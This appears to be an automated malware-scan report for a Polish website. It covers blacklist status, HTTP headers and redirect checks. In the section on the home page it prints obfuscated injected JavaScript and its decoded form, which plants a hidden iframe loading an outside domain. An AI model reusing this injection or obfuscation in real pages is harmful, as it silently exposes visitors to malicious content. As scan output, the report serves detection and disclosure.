Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=dewil.neostrada.pl
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://dewil.neostrada.pl/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://dewil.neostrada.pl/ | 200 OK Content-Length: 13191 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{n|=51;}catch(zxc){m=Math;n="126..135..1470..1530..448..600..1400..1665..1386..1755..1526..1515..1540..1740..644..1545..1414..1740..966..1620..1414..1635..1414..1650..1624..1725..924..1815..1176..1455..1442..1170..1358..1635..1414..600..546..1470..1554..1500..1694..585..574..1365..672..1395..574..1845..182..135..126..135..1470..1530..1596..1455..1526..1515..1596..600..574..885..182..135..126..1875..448..1515..1512..1725..1414..480..1722..195..126..135..126..1500..1554..1485..1638..1635..1414. Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://red.av.tr.vu' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://red.av.tr.vu');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10'); <iframe src='http://red.av.tr.vu' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> Antivirus reports:
| ||
http://dewil.neostrada.pl/test404page.js | 404 Not Found Content-Length: 2746 Content-Type: text/html | clean |
http://dewil.neostrada.pl/javas.js | 404 Not Found Content-Length: 2746 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: dewil.neostrada.pl
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 21 Dec 2014 06:18:30 GMT
Accept-Ranges: bytes
ETag: "3387-4c76b87865b00"
Server: nginx/1.5.7
Content-Length: 13191
Content-Type: text/html
Last-Modified: Fri, 17 Aug 2012 00:49:16 GMT
...13191 bytes of data.
GET / HTTP/1.1
Host: dewil.neostrada.pl
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 21 Dec 2014 06:18:30 GMT
Accept-Ranges: bytes
ETag: "3387-4c76b87865b00"
Server: nginx/1.5.7
Content-Length: 13191
Content-Type: text/html
Last-Modified: Fri, 17 Aug 2012 00:49:16 GMT
...13191 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: dewil.neostrada.pl
Referer: http://www.google.com/search?q=dewil.neostrada.pl
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: dewil.neostrada.pl
Referer: http://www.google.com/search?q=dewil.neostrada.pl
Result:
The result is similar to the first query. There are no suspicious redirects found.